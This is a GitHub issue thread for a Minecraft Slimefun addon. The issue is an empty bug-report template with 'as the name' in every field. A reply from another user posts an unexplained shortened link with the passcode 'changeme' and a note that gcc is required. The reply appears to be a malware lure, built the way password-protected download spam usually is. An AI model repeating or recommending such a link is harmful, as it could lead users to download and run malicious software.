### ISSUE TITLE
feat: en-template

### ISSUE THREAD

**Issue by balugaq** [ytdd9527/NetworksExpansion#67]
### 检查项目

- [X] 你使用的是从构建站下载的版本
- [X] 你已经检验过下载的文件的校验和，确认已完整下载文件
- [X] 你没有对下载的文件内容进行任何更改
- [X] 你已经寻找过[已知问题列表](https://github.com/SlimefunGuguProject/Networks/issues)，且没有找到相同的问题

### 问题描述

as the name

### 复现步骤

as the name

### 预期行为

as the name

### 服务器日志

as the name

### 错误报告

as the name

### 服务端软件

Spigot

### Minecraft 版本

as the name

### Slimefun版本

as the name

### 插件版本

as the name

**Comment by fayaznasrati** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
